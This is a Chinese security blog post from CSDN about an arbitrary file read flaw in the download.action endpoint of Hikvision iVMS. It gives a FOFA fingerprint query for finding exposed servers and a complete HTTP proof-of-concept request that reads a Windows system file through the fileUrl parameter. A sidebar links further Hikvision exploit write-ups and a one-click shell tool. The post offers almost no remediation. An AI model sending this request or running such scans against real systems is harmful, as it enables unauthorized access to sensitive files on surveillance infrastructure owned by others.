HIKVISION iVMS download.action存在任意文件读取漏洞(DVB-2025-8938)

最新推荐文章于 2025-03-26 08:09:11 发布
最新推荐文章于 2025-03-26 08:09:11 发布
阅读量426 收藏
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/user_hs/article/details/146178867

一、漏洞简介

海康威视iVMS(智能视频管理系统)是一款集视频监控、存储、管理、分析于一体的综合管理平台,广泛应用于安防领域。该产品支持多设备接入,提供实时监控、录像回放、智能分析、报警管理等功能,具备高可靠性和易用性,适用于各类场景如智慧城市、交通、金融、教育等,帮助用户实现高效、智能的安全管理。

海康威视iVMS download.action存在任意文件读取漏洞,攻击者可以读取服务器任何文件,获取服务器敏感信息

二、漏洞影响

海康威视iVMS

在这里插入图片描述

三、网络测绘:

fofa:
icon_hash="-911494769"

四、复现过程

在这里插入图片描述

POC 1

GET /eps/triggerSnapshot/download.action?fileUrl=file:///C:/windows/win.ini HTTP/1.1
Host:
User-Agent: MicroMessenger
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 6261
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)
李火火的安全圈
01-19 1487
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
热门推荐
菜鸟学渗透
05-22 1万+
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
2025年最新CVE-2017-7921漏洞复现
最新发布
2303_78851087的博客
03-26 1342
2025年最新CVE-2017-7921漏洞复现
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
菜鸟学渗透
10-08 3493
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 8807
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
【工具推荐】Hikvision - 一款海康威视综合漏洞利用工具,适用于漏洞挖掘、SRC漏洞挖掘、护网红队、渗透测试,支持一键获取 shell。
weixin_58203004的博客
10-15 1043
【工具推荐】Hikvision - 一款海康威视综合漏洞利用工具,适用于漏洞挖掘、SRC漏洞挖掘、护网红队、渗透测试,支持一键获取 shell。
Hikvision IVMS-8700 任意文件上传(含批量验证poc)
weixin_43567873的博客
04-07 622
Hikvision IVMS-8700 任意文件上传(含批量验证poc)
HIKVISION iVMS-8700 综合安防管理平台软件 配置指南 V3.0.0.pdf
08-14
根据提供的文件内容,以下为详细知识点: 标题:《HIKVISION iVMS-8700 综合安防管理平台软件 配置指南 V3.0.0》 知识点:文档描述了海康威视公司开发的HIKVISION iVMS-8700综合安防管理平台软件的配置指南,该指南...
hikvision-decrypter.zip
11-29
标题中的"hikvision-decrypter.zip"是一个压缩包文件,主要包含了用于解密海康威视(Hikvision)设备配置文件的工具。海康威视是一家知名的安防监控设备制造商,其产品广泛应用于全球各地。这个解密工具显然是为了...
[问题处理]springboot集成海康威视接口报错“无法解析 com.hikvision.ga:artemis-http-client:1.1.8 ”问题的解决方式
有青枫林的博客
04-23 1728
门禁使用了海康威视的系统,需要借助于海康的开放平台进行二开的时候,从平台拿到开发指南,但在第一步就遇到了阻碍,pom在导入maven坐标时,报错“无法解析 com.hikvision.ga:artemis-http-client:1.1.8 ”
Hikvision 工具包.zip
02-01
Hikvision工具包:深度探索与应用》 在IT行业中,开发工具是开发者们不可或缺的利器,它们能够极大地提高工作效率,简化复杂任务。而提到Hikvision,这个品牌在全球安防监控领域享有极高的声誉,其产品和服务广泛...
漏洞复现】Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 3572
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1644
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
海康威视iSecure-Center 综合安防管理平台 download 任意文件读取漏洞
WuYSec的博客
06-12 1024
海康威视iSecure-Center综合安防管理平台是一款“集成化”、“智能化”的平台,能够接入视频监控、一卡通、停车场、报警检测等系统设备。通过海康威视的集成化综合管理软件平台,可以对接入的视频监控点进行集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视iSecure-Center综合安防管理平台/orgManage/v1/orgs/download接口存在任意文件读取漏洞,可通过此漏洞读取任意文件
海康威视综合安防管理平台 orgManage/v1/orgs/download 任意文件读取漏洞复现
0xSec
05-31 1822
海康威视综合安防管理平台 orgManage/v1/orgs/download 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用目录遍历的方式绕过权限认证直接读取后台服务器配置文件等敏感文件,造成信息泄露,使系统处于极不安全的状态。
探索安全新边界:Hikvision综合漏洞利用工具
gitblog_00058的博客
06-20 972
探索安全新边界:Hikvision综合漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 在网络安全领域,提前发现并修复漏洞至关重要。为此,我们荣幸地向您推介一款由C#语言编写的开源项目——Hikvision综合漏洞利用工具。这款工具专门针对海康威视的产品,旨在帮助安全研究人员和管理员检测与利用一系列已知的安全漏洞,确保网络环境的安全性。 2、项目技术分析...
漏洞复现】Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 2706
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
HiKVISION 综合安防管理平台 env信息泄漏漏洞,2024年最新网络安全源码剖析之Framwork层消息传递
2301_76225520的博客
04-13 1055
Hikvision是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
HIKVISION iVMS-8700综合安防管理平台V3.0.0配置手册详解
HIKVISION iVMS-8700 综合安防管理平台软件配置指南 V3.0.0》是一份详尽的指南,专为杭州海康威视系统技术有限公司出品的iVMS-8700综合安防管理平台设计。该手册版权属于海康威视,未经授权禁止任何形式的摘录、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值